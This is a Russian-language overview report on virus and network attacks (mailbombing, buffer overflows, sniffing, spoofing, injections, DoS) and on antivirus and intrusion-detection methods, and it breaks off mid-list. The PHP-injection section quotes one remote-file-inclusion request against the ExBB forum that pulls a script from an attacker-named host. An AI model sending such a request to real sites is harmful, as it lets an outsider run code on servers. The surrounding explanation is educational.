Вирусы и вирусные атаки

Содержание:

Введение

1. Вирусные атаки и их виды.
2. Средства обнаружения вирусных атак.

Заключение 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Введение

     Вирусная атака - это покушение на удалённую/локальную вычислительную систему с использованием вредоносных программ (вирусов).

     Вирусные  атаки представляет собой более изощрённый метод получения доступа к закрытой информации, так как хакеры используют специальные программы для ведения работы на компьютере жертвы, а также дальнейшего распространения (это вирусы и черви). Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны.

     На  данный момент вирусные атаки представляют серьезную угрозу для простых  пользователей, не говоря уже и о  крупных предприятиях, информация которых  может иметь огромную ценность. Именно по этой причине организация и проведение вирусных атак представляет из себя целую индустрию, в которой заинтересованы не только злоумышленники (сетевые преступники), но и производители антивирусного ПО.

     Мы, как простые пользователи ПК, должны знать, как защититься от вирусных атак, как не стать ее случайными участниками, а для этого нужно знать  – что же такое вирусная атака, способы и методы их применения. 
 
 
 
 
 
 
 
 

1. Вирусные атаки и их виды.

 

     Вирусная атака - действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании. 

1. Mailbombing

     Считается самым старым методом атак, хотя суть его проста и примитивна: большое  количество почтовых сообщений делают невозможными работу с почтовыми  ящиками, а иногда и с целыми почтовыми  серверами. Для этой цели было разработано  множество программ, и даже неопытный  пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку сложно предотвратить, так как даже почтовые фильтры провайдеров не могут определить реального отправителя спама. Провайдер может ограничить количество писем от одного отправителя, но адрес отправителя и тема зачастую генерируются случайным образом. 

2. Переполнение  буфера

     Пожалуй, один из самых распространенных типов  атак в Интернете. Принцип данной атаки построен на использовании  программных ошибок, позволяющих  вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя, под которым работала уязвимая программа. Если программа работает под учётной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учётной записью рядового пользователя, имеющего ограниченные права на системе, а под учётной записью администратора системы выполнять только операции, требующие административные права. 

3. Сетевая разведка

     В ходе такой атаки собственно не производится никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.

     В ходе такой разведки злоумышленник  может производить сканирование портов, запросы DNS, эхо-тестирование открытых портов, наличие и защищённость прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей. 

4. Сниффинг пакетов

     Также довольно распространённый вид атаки, основанный на работе сетевой карты  в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемым сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании. 

5. IP-спуфинг

     Тоже  распространённый вид атаки в  недостаточно защищённых сетях, когда  злоумышленник выдаёт себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого  крэкеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений. 

6. Man-in-the-Middle

     Вид атаки, когда злоумышленник перехватывает  канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа  на таком уровне злоумышленник может  модифицировать информацию нужным ему  образом, чтобы достичь своих  целей. Цель такой атаки — кража  или фальсифицирование передаваемой информации, или же получение доступа  к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации. 

7. Инъекция

     Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних  команд или данных в работающую систему  с целью изменения хода работы системы, а в результате — получение  доступа к закрытым функциям и  информации, либо дестабилизации работы системы в целом. Наиболее популярна  такая атака в сети Интернет, но также может быть проведена через  командную строку системы.

     SQL-инъекция  — атака, в ходе которой  изменяются параметры SQL-запросов  к базе данных. В результате  запрос приобретает совершенно  иной смысл, и в случае недостаточной  фильтрации входных данных способен  не только произвести вывод  конфиденциальной информации, но  и изменить/удалить данные. Очень  часто такой вид атаки можно  наблюдать на примере сайтов, которые используют параметры командной строки (в данном случае — переменные URL) для построения SQL-запросов к базам данных без соответствующей проверки.

     Вместо  проверки можно подставить утверждение, которое будучи истинным позволит обойти проверку 

     PHP-инъекция  — один из способов взлома  веб-сайтов, работающих на PHP. Он заключается  в том, чтобы внедрить специально  сформированный злонамеренный сценарий  в код веб-приложения на серверной  стороне сайта, что приводит  к выполнению произвольных команд. Известно, что во многих распространённых  в интернете бесплатных движках  и форумах, работающих на PHP (чаще  всего это устаревшие версии) есть непродуманные модули или  отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости, как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом:

     GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? .

     Межсайтовый скриптинг или XSS (аббр. от англ.  Cross Site Scripting) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются HTML-код и скрипты, выполняющиеся на стороне клиента, чаще всего JavaScript. Другие названия: CSS, реже — скрипт-инъекция.

     XPath-инъекция - вид уязвимостей, который заключается во внедрении XPath-выражений в оригинальный запрос к базе данных XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных. 

8. Отказ в обслуживании

     DoS (от англ. Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своём коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.

     DDoS (от англ. Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.

     Любая атака представляет собой не что  иное, как попытку использовать несовершенство системы безопасности жертвы либо для  получения информации, либо для нанесения  вреда системе, поэтому причиной любой удачной атаки является профессионализм крэкера и ценность информации, а также недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения и недостаточное внимание к вопросам безопасности в компании в целом. 
 
 
 

2. Средства  обнаружения вирусных атак.

 

     На  данный момент антивирусное программное  обеспечение разрабатывается в  основном для ОС семейства Windows от компании Microsoft, что вызвано большим количеством вредоносных программ именно под эту платформу (а это, в свою очередь, вызвано большой популярностью этой ОС, также как и большим количеством средств разработки, в том числе бесплатных и даже «инструкций по написанию вирусов»). В настоящий момент на рынок выходят продукты и под другие платформы настольных компьютеров, такие как Linux и Mac OS X. Это вызвано началом распространения вредоносных программ и под эти платформы, хотя UNIX-подобные системы всегда славились своей надежностью. Например, известное видео «Mac or PC» шуточно показывает преимущество Mac OS над Windows и большим антивирусным иммунитетом Mac OS по сравнению с Windows. 

     Помимо  ОС для настольных компьютеров и  ноутбуков, также существуют платформы  и для мобильных устройств, такие  как Windows Mobile, Symbian, iOS, BlackBerry, Android, Windows Phone 7 и др. Пользователи устройств на данных ОС также подвержены риску заражения вредоносным программным обеспечением, поэтому некоторые разработчики антивирусных программ выпускают продукты и для таких устройств. 

Классификация антивирусных продуктов

     Классифицировать  антивирусные продукты можно сразу  по нескольким признакам, таким как: используемые технологии антивирусной защиты, функционал продуктов, целевые  платформы. 
 
 

     По  используемым технологиям  антивирусной защиты:

• Классические антивирусные продукты (продукты, применяющие только сигнатурный метод детектирования)
• Продукты проактивной антивирусной защиты (продукты, применяющие только проактивные технологии антивирусной защиты);
• Комбинированные продукты (продукты, применяющие как классические, сигнатурные методы защиты, так и проактивные)

 

     По  функционалу продуктов:

• Антивирусные продукты (продукты, обеспечивающие только антивирусную защиту)
• Комбинированные продукты (продукты, обеспечивающие не только защиту от вредоносных программ, но и фильтрацию спама, шифрование и резервное копирование данных и другие функции)

 

     Эффективность системы обнаружения атак во многом зависит от применяемых методов  анализа полученной информации. В  первых системах обнаружения атак, разработанных в начале 1980-х годов, использовались статистические методы обнаружения атак. В настоящее  время к статистическому анализу  добавился ряд новых методик, начиная с экспертных систем и  нечёткой логики и заканчивая использованием нейронных сетей. 

     

1. Статистический  метод

     Основные  преимущества статистического подхода  — использование уже разработанного и зарекомендовавшего себя аппарата математической статистики и адаптация  к поведению субъекта.

     Сначала для всех субъектов анализируемой  системы определяются профили. Любое  отклонение используемого профиля  от эталонного считается несанкционированной деятельностью. Статистические методы универсальны, поскольку для проведения анализа не требуется знания о возможных атаках и используемых ими уязвимостях. Однако при использовании этих методик возникают и проблемы: